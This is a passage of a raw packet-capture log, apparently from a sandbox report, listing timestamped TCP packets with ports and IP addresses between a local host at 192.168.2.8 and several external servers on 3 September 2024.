Sep 3, 2024 17:13:20.532754898 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532757998 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.532766104 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532773972 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.532778025 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532789946 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532800913 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532812119 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532814026 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.532823086 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532836914 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532843113 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.532855034 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532866955 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.532867908 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532881021 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532886028 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.532892942 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532903910 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532913923 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532913923 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.532926083 CEST	80	49734	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:20.532944918 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532951117 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.532955885 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532962084 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.532969952 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532987118 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532995939 CEST	49734	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:20.533000946 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533011913 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533015013 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.533025026 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533036947 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.533055067 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.533070087 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.533183098 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533195019 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533200979 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533205986 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533210993 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533262968 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.533878088 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533895969 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533905029 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533916950 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533929110 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533938885 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533941984 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.533951044 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533962011 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.533962965 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533976078 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.533986092 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.533993959 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534004927 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534007072 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534018993 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534019947 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534033060 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534043074 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534054041 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534065962 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534068108 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534079075 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534090996 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534096956 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534102917 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534111023 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534115076 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534146070 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534147978 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534157991 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534176111 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534177065 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534188986 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534199953 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534203053 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534244061 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534653902 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534666061 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534676075 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534714937 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534730911 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534801006 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534813881 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534825087 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534836054 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534842968 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534847021 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534859896 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534871101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534872055 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534903049 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534917116 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534935951 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534949064 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534957886 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534970999 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534981012 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.534984112 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.534992933 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535003901 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535015106 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535021067 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535031080 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535033941 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535047054 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535065889 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535072088 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535084963 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535095930 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535103083 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535109043 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535115957 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535131931 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535135984 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535149097 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535160065 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535165071 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535175085 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535193920 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535718918 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535731077 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535742044 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535759926 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535770893 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535780907 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535787106 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535793066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535804987 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535808086 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535816908 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535828114 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535829067 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535845041 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535845041 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535864115 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535875082 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.535877943 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535887957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.535898924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.535906076 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535912037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.535923004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.535932064 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.535933018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.535944939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.535952091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.535952091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.535962105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.535974026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.535985947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.535985947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.535993099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536005974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536015987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536031961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536031961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536071062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536334991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536348104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536356926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536370039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536379099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536391973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536422014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536422014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536468029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536485910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536533117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536662102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536673069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536683083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536694050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536710978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536721945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536734104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536744118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536744118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536744118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536758900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536761045 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536771059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536782026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536792994 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536792994 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536799908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536809921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536819935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536832094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.536832094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536859989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.536891937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537008047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537020922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537030935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537041903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537053108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537062883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537071943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537084103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537095070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537121058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537142038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537451982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537463903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537492990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537516117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537585020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537596941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537606955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537611961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537621975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537633896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537633896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537633896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537651062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537664890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537674904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537692070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537692070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537729025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537746906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537759066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537769079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537780046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537791014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537801027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537810087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537810087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537853003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537880898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537893057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537904978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537914991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537926912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537940025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.537945032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537957907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537969112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.537971973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.538003922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.538003922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.538235903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.538248062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.538258076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.538269043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.538278103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.538281918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.538310051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.538367033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.538373947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.538381100 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538392067 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538403988 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538418055 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538424015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.538431883 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538433075 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538433075 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538465023 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538575888 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538588047 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538599968 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538610935 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538620949 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538633108 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538634062 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538645983 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538645983 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538657904 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538666010 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538671017 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538686991 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538697004 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538706064 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538717985 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538724899 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538731098 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538743019 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538743973 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538770914 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538794994 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538919926 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538930893 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538940907 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.538969040 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.538991928 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539246082 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539258003 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539268017 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539294958 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539319038 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539386034 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539397955 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539403915 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539413929 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.539423943 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.539427996 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539433956 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.539443970 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.539453030 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.539463043 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.539465904 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539474010 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539484978 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539521933 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539525986 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539546013 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539557934 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539570093 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539581060 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539592028 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539592028 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539604902 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539609909 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539630890 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539649963 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539679050 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539690971 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.539700985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.539710999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.539722919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.539731026 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.539733887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.539746046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.539757013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.539767981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.539779902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.539783955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.539783955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.539819002 CEST	49730	80	192.168.2.8	52.212.52.84
